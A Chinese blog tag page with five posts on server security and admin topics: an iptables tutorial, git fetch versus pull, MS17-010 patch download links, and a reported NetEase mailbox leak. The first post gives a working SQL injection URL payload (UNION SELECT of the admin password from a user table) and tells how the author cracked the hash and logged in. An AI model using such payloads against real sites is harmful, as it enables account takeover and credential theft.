标签: 安全防护

  • 记一次PHP MySQL注入入侵

    记一次PHP MySQL注入入侵

    刚刚发现公司程序代码有SQL注入 and 1=1 注入漏洞,由于是内部系统所以省去很多麻烦我这边就不需要去爆具体查表结构了,直接上侵入的地址参数。

    ?id=1598%20union%20select%201,2,3,4,5,6,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22%20from%20user%20where%20username=0x61646d696e%20limit%201,1

    这里 username=admin ,然后通过16进制以后变成: 61646d696e ,前面需要加 0x 变成16进制。

    红色涂改部分为:admin的密码。然后通过MD5值反向解密,或者admin用户的密码。登录成功!

  • Vultr VPS 安装了Debian系统后如何修改iptables规则配置 图文教程

    Vultr VPS 安装了Debian系统后如何修改iptables规则配置 图文教程

    前面的文章我们讲述了Debian9系统如何修改SSH端口 图文教程,这里讲述一下我们在购买Vultr(Vultr 优惠活动 注册即送$50美金,16个机房可选,按时计费)之后如何修改完了SSH之后将规则添加到iptables中。

    我们这里就将ssh修改成19521然后如何将规则添加到iptables中为例。

    下面我们用iptables-save命令将配置好的iptables的规则保存到/etc/local/iptables/rules.v4.1.save文件

    导出现有的规则

    iptables-save > /etc/iptables/rules.v4.save

    修改规则配置文件

    vi /etc/iptables/rules.v4.save

    Firewall configuration written by system-config-securitylevel
    Manual customization of this file is not recommended.
    *filter
    :INPUT DROP [0:0]
    :FORWARD ACCEPT [0:0]
    :OUTPUT ACCEPT [0:0]
    :syn-flood – [0:0]
    -A INPUT -i lo -j ACCEPT
    -A INPUT -m state –state RELATED,ESTABLISHED -j ACCEPT
    -A INPUT -p tcp -m state –state NEW -m tcp –dport 22 -j ACCEPT
    -A INPUT -p tcp -m state –state NEW -m tcp –dport 19521 -j ACCEPT
    -A INPUT -p tcp -m state –state NEW -m tcp –dport 80 -j ACCEPT
    -A INPUT -p tcp -m state –state NEW -m tcp –dport 443 -j ACCEPT
    -A INPUT -p icmp -m icmp –icmp-type 8 -j ACCEPT
    COMMIT

    我们这里已将19521端口添加到了规则中。

    重新导入新的iptables规则

    iptables-resotre < /etc/iptables/rules.v4.save

    查看新的iptables规则

    iptables -L -n
  • Git中从远程的分支获取最新的版本到本地

    Git中从远程的分支获取最新的版本到本地

    Git中从远程的分支获取最新的版本到本地有这样2个命令:

    1.git fetch:相当于是从远程获取最新版本到本地,不会自动merge

    git fetch origin master
    git log -p master..origin/master
    git merge origin/master

    以上命令的含义:
    首先从远程的origin的master主分支下载最新的版本到origin/master分支上
    然后比较本地的master分支和origin/master分支的差别
    最后进行合并

    上述过程其实可以用以下更清晰的方式来进行:

    git fetch origin master:tmp
    git diff tmp
    git merge tmp

    从远程获取最新的版本到本地的test分支上
    之后再进行比较合并

    2. git pull:相当于是从远程获取最新版本并merge到本地

    git pull origin master

    上述命令其实相当于git fetch 和 git merge
    在实际使用中,git fetch更安全一些
    因为在merge前,我们可以查看更新情况,然后再决定是否合并

  • 2003到2016各版服务器操作系统ms17-010补丁直链地址

    特别提醒:

    1、确保135,137,139,445端口已通过路由器、端口策略,防火墙封闭的,或者其他安全工具(比如360NSA武器库免疫工具:http://dl.360safe.com/nsa/nsatool.exe)补丁过的,可以不打微软补丁,但若不清楚或者不确定的,请务必打上微软的补丁

    2、2008和2003、XP必打,现在均有漏洞批量利用工具
    2012和2016好一些没有大面积被黑,但是都建议打上对应补丁,因为没有批量利用工具做出来,不代表这个漏洞是无法利用的,有可能只是工具还没开发出来而已


    20170513微软发布了Windows XP和Windows 2003的ms17-010特别补丁,详情请看以下链接

    https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

    ——————————-
    winxp特别补丁 – KB4012598
    ——————————-
    winxp3 32位 Security Update for Windows XP SP3 (KB4012598)

    http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-custom-chs_dca9b5adddad778cfd4b7349ff54b51677f36775.exe

    winxp2 64位 Security Update for Windows XP SP2 for x64-based Systems (KB4012598)

    http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe

    ——————————-
    win2003特别补丁 – KB4012598
    ——————————-
    2003SP2 32位 Security Update for Windows Server 2003 (KB4012598)

    http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x86-custom-chs_b45d2d8c83583053d37b20edf5f041ecede54b80.exe

    2003SP2 64位 Security Update for Windows Server 2003 for x64-based Systems (KB4012598)

    http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-chs_68a2895db36e911af59c2ee133baee8de11316b9.exe

    ——————————-
    2008R2补丁 KB4012212、KB4012215
    ——————————-
    March, 2017 Security Only Quality Update for Windows Server 2008 R2 for x64-based Systems (KB4012212)

    http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windows6.1-kb4012212-x64_2decefaa02e2058dcd965702509a992d8c4e92b3.msu

    March, 2017 Security Monthly Quality Rollup for Windows Server 2008 R2 for x64-based Systems (KB4012215)

    http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/03/windows6.1-kb4012215-x64_a777b8c251dcd8378ecda(论坛关键词屏蔽,请去掉我)fa81aefbe7f9009c72b.msu

    ——————————-
    win7补丁 KB4012212、KB4012215
    ——————————-
    win7 32位
    March, 2017 Security Only Quality Update for Windows 7 (KB4012212)

    http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windows6.1-kb4012212-x86_6bb04d3971bb58ae4bac44219e7169812914df3f.msu

    March, 2017 Security Monthly Quality Rollup for Windows 7 (KB4012215)

    http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/03/windows6.1-kb4012215-x86_e5918381cef63f171a74418f12143dabe5561a66.msu

    win7 64位
    March, 2017 Security Only Quality Update for Windows 7 for x64-based Systems (KB4012212)

    http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windows6.1-kb4012212-x64_2decefaa02e2058dcd965702509a992d8c4e92b3.msu

    March, 2017 Security Monthly Quality Rollup for Windows 7 for x64-based Systems (KB4012215)

    http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/03/windows6.1-kb4012215-x64_a777b8c251dcd8378ecda(论坛关键词屏蔽,请去掉我)fa81aefbe7f9009c72b.msu

    ——————————-
    win10 1607补丁 KB4013429
    ——————————-
    win10 1607 32位
    Cumulative Update for Windows 10 Version 1607 (KB4013429)

    http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/03/windows10.0-kb4013429-x86_8b376e3d0bff862d803404902c4191587afbf065.msu

    win10 1607 64位
    Cumulative Update for Windows 10 Version 1607 for x64-based Systems (KB4013429)

    http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/03/windows10.0-kb4013429-x64_ddc8596f88577ab739cade1d365956a74598e710.msu

    ——————————-
    2012R2补丁 KB4012213、KB4012216
    ——————————-
    March, 2017 Security Only Quality Update for Windows Server 2012 R2 (KB4012213)

    http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/02/windows8.1-kb4012213-x64_5b24b9ca5a123a844ed793e0f2be974148520349.msu

    March, 2017 Security Monthly Quality Rollup for Windows Server 2012 R2 (KB4012216)

    http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/03/windows8.1-kb4012216-x64_cd5e0a62e602176f0078778548796e2d47cfa15b.msu

    ——————————-
    2016补丁 KB4013429
    ——————————-
    Cumulative Update for Windows Server 2016 for x64-based Systems (KB4013429)

    http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/03/windows10.0-kb4013429-x64_ddc8596f88577ab739cade1d365956a74598e710.msu

  • #网易邮箱52GB# 数据全公开 在用网易邮箱的小伙伴们赶快修改密码吧~

    QQ截图20160406132509
    3.30日晚上21点 微博网友@ringzero 给出了一份所谓的“网易52G库”,称就是去年被泄露的网易163、126邮箱数据,总数据量多达52GB。

     

    并且从截图可以看出 所有密码数据 都是明文。

    该网友称已经开始分析泄漏数据的影响程度,但他也同时明确表示,这份数据的真假尚不清楚,需要研究后再判断,如果是假的或者危害没有那么重,会给网易一个道歉。

    目前发布者@ringzero 爆料博文已经被 新浪加以权限 ?原文已经看不到了 ?且分享的百度云链接也失效了

    4124124

     

    ——————————————————————————–

    3.31日更新 ?目前已知昨晚转存到文件同学 已经无法在次分享这次泄漏的数据库文件

    并且在4.1日00:30分左右 ?百度云官方切断了所有正在下载的文件 ?并且重新连接下载会直接?302 到 wenxintishi.mp4

    20160331093041854

     

    最后,回到本文主题,目前有热心站长针对此数据库制作了相关的查询网站,赶紧快速查询修改密码吧:

    网易52G密码库查询:https://163password.download/

    无论是因为查询量过大,还是相关法律法规问题等因素最终都将会影响网站的正常打开访问查询,因此,需要查询的应该赶紧!

    查询结果分两种:

    如果输入查询的邮箱返回了类似“xxxx@163.com—-12345678”等包含账号和明文密码的结果,很不幸,相关信息已经残遭泄露。

    如果输入查询的邮箱返回了的是“未找到”或者“xxxx@163.com—-”等不包含密码的结果,恭喜,相关信息并没有在数据中出现泄漏,但是账号安全问题仍不容忽视!

    在用网易邮箱的小伙伴们赶紧重新修改密码吧~

WeChat